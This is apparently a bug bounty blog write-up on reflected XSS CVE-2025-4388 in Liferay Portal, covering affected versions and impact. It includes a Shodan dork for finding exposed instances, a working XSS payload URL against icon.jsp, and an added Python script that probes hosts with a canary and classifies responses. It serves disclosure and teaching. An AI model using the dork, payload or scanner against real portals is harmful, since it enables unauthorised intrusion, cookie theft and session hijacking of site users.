# I Asked Shodan, It Gave Me a Bounty: Says ‘Sure, Why Not?’ $$

Hello Hunters! I’m Abdelrahman (A0xtrojan), and I’m excited to share my write-up with you about a bug I found in a public program on Intigriti. So, without wasting time, let’s dive right in.

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/0*4Esrq7KV8s6ic2cL.jpg" alt="" height="700" width="700"><figcaption></figcaption></figure>

In the last days of my bug bounty journey I decided to learn new techniques for my recon process. So what had I never learned before? Yes, Shodan. Luckily a good friend suggested a great video on learning Shodan by the master of recon [Orwa Atyat](https://medium.com/u/7ab3832ef76d); I will put the link at the end, so let’s continue.

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/0*nGddunLz99eBaFkO.jpg" alt="" height="700" width="700"><figcaption><p>lets go</p></figcaption></figure>

> *One day, while I was preparing a write-up for a newly discovered CVE, I came across another researcher’s write-up covering the same vulnerability. It was an unexpected coincidence, but it pushed me to dig deeper and refine my own analysis.*

<figure><img src="https://miro.medium.com/v2/resize:fit:509/0*SL0WUwraUg8cYzll.gif" alt="" height="250" width="339"><figcaption></figcaption></figure>

### Theory: Understanding CVE-2025-4388 (Liferay Portal RXSS) <a href="#id-4436" id="id-4436"></a>

**CVE-2025-4388** is a **reflected cross-site scripting (RXSS)** vulnerability in Liferay Portal 7.4.0 through 7.4.3.131, and in Liferay DXP 2024.Q4.0 through 2024.Q4.5, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, and 7.4 GA through update 92. It allows a remote, unauthenticated attacker to inject JavaScript through the `modules/apps/marketplace/marketplace-app-manager-web` module.

### Affected Software <a href="#fccf" id="fccf"></a>

* **Liferay Portal / DXP** in the version ranges listed above
* Vulnerable when rendering unsanitized query strings in:
  * `meta refresh` tags
  * redirect URLs
  * certain `GET` parameters on guest/public pages

To discover targets vulnerable to CVE-2025-4388, you can use **Shodan**, **Censys**, or similar search engines to look for internet-exposed Liferay instances.

**The Setup**

First I pointed Shodan at the target’s IP space to find Liferay instances, using this dork (it matches the `liferayPortalCSS` stylesheet id that Liferay pages include; combine it with `hostname:` or `ssl:` filters to keep the results inside the program’s scope):

```
html:"liferayPortalCSS"
```

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/1*BEuDMQ-TNyv7SJzT1RPuBg.png" alt="" height="377" width="700"><figcaption></figcaption></figure>

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/1*idWVq6ZkHequuNZjfImzZQ.png" alt="" height="41" width="700"><figcaption></figcaption></figure>

After selecting a target, request this path to trigger the reflected XSS (the `iconURL` value closes the `src` attribute with `">` and injects an `img` element whose `onerror` handler runs):

```
/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
```

Result: the `onerror` handler fired and `alert(document.domain)` executed in the origin of the portal.

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/1*Ir6cXQC3dYGyds66gMzBpw.png" alt="" height="217" width="700"><figcaption></figcaption></figure>
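To make the two steps above (the Shodan dork and the `icon.jsp` payload) repeatable across a list of hosts, here is an added example in Python; it is not part of the original write-up or of Liferay’s code. It swaps `alert(document.domain)` for a random letters-and-digits canary, so a hit is confirmed by finding the raw `"><canary>` attribute breakout in the response body instead of by a popup, and it tells an unescaped reflection apart from one that a patched instance entity-encoded. The sample response bodies, the `cve-2025-4388-check` User-Agent string and the `portal.example` host are constructed for illustration; `hostname:` is a standard Shodan filter.

```python
"""Added example (not part of the original write-up or of Liferay's code):
build the CVE-2025-4388 probe for /o/marketplace-app-manager-web/icon.jsp with a
random canary instead of alert(), and classify a response body as an unescaped
reflection, an entity-encoded reflection, or no reflection at all."""
import secrets
import urllib.error
import urllib.parse
import urllib.request

ICON_PATH = "/o/marketplace-app-manager-web/icon.jsp"
# Same dork as the write-up; `hostname:` is a standard Shodan filter that scopes
# the results to the program's domains.
SHODAN_DORK = 'html:"liferayPortalCSS"'


def shodan_query(domain: str) -> str:
    """Scope the Liferay dork to one in-scope domain."""
    return f'{SHODAN_DORK} hostname:"{domain}"'


def make_canary() -> str:
    """Letters/digits only, so it survives punctuation filtering and cannot
    collide with normal page content."""
    return "cv" + secrets.token_hex(6)


def breakout(canary: str) -> str:
    """Attribute-breakout fragment: close the src value, then open a tag.
    Mirrors the original payload's  https:///"><img ...>  shape."""
    return f'https:///"><{canary}>'


def build_probe_url(base: str, canary: str) -> str:
    """Full GET URL; ':' and '/' are left unencoded as in the original payload."""
    return (f"{base.rstrip('/')}{ICON_PATH}?iconURL="
            + urllib.parse.quote(breakout(canary), safe=":/"))


def classify(body: str, canary: str) -> str:
    """'vulnerable' if the quote and angle brackets reached the HTML unencoded,
    'escaped' if the canary came back but the breakout characters did not,
    'not-reflected' otherwise."""
    if f'"><{canary}>' in body:
        return "vulnerable"
    if canary in body:
        return "escaped"
    return "not-reflected"


def probe(base: str, timeout: float = 10.0) -> str:
    """Live check against one host (uses the network; not run by the offline demo)."""
    canary = make_canary()
    req = urllib.request.Request(build_probe_url(base, canary),
                                 headers={"User-Agent": "cve-2025-4388-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # 4xx/5xx bodies can still reflect
        body = err.read().decode("utf-8", "replace")
    return classify(body, canary)


# Constructed sample responses for offline use: what an unpatched icon.jsp emits
# if it drops iconURL straight into src, what an attribute-escaping fix emits,
# and an unrelated page.
SAMPLE_CANARY = "cvdeadbeef0123"
SAMPLE_VULNERABLE = '<img src="https:///"><cvdeadbeef0123>" class="marketplace-icon">'
SAMPLE_PATCHED = '<img src="https:///&quot;&gt;&lt;cvdeadbeef0123&gt;" class="marketplace-icon">'
SAMPLE_UNRELATED = "<html><body>Welcome to the portal</body></html>"

if __name__ == "__main__":
    print(shodan_query("portal.example"))
    print(build_probe_url("https://portal.example", SAMPLE_CANARY))
    for name, body in [("vulnerable", SAMPLE_VULNERABLE),
                       ("patched", SAMPLE_PATCHED),
                       ("unrelated", SAMPLE_UNRELATED)]:
        print(f"{name:>10}: {classify(body, SAMPLE_CANARY)}")
```

Run `probe("https://<host>")` against each host from the Shodan results; an `escaped` verdict means the parameter is still reflected but the `"` and `<` were encoded, which is what a fixed build looks like, while `vulnerable` is the state shown in the screenshot above. Keep the canary approach for the report too: a screenshot of the raw breakout in the response is as convincing as an alert box and does not execute anything in the target’s users’ browsers.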

<figure><img src="https://miro.medium.com/v2/resize:fit:540/0*hnctgKTRqJYKveYG.gif" alt="" height="203" width="360"><figcaption><p>hacking</p></figcaption></figure>

### Impact: <a href="#id-652b" id="id-652b"></a>

* Exploitable without authentication on public-facing portals; the victim only has to open a crafted link
* Allows, in the origin of the vulnerable portal:
  * Cookie theft (only for cookies not flagged `HttpOnly`)
  * Phishing/redirection
  * Session hijacking (actions performed in the victim’s authenticated session)

After reporting it to Skoda on Intigriti, the report was accepted. $$

<figure><img src="https://miro.medium.com/v2/resize:fit:747/0*o7iC1g9hOC_YZmx1.gif" alt="" height="359" width="498"><figcaption></figcaption></figure>

Thank you for your time reading my write-up. I will publish the next vulnerability soon :) and I hope you share, like and support my write-ups :) stay safe

Follow me on Social Media :

[LinkedIn](https://www.linkedin.com/in/abdelrahman-tamer-6a932924a/) | [X](https://x.com/A0xTrojan) | [Youtube](https://www.youtube.com/channel/UC7smGv7AAcXMY5rrCpP5t8A) | [Facebook](https://www.facebook.com/abdo.tamer.313)

<figure><img src="https://miro.medium.com/v2/resize:fit:1050/1*ZUhuHdJX7ZW1u3Rp4RdSkg.jpeg" alt="" height="380" width="700"><figcaption></figcaption></figure>


<figure><img src="https://miro.medium.com/v2/resize:fit:1050/0*I6WXh1fF6OpULIjE" alt="" height="399" width="700"><figcaption></figcaption></figure>


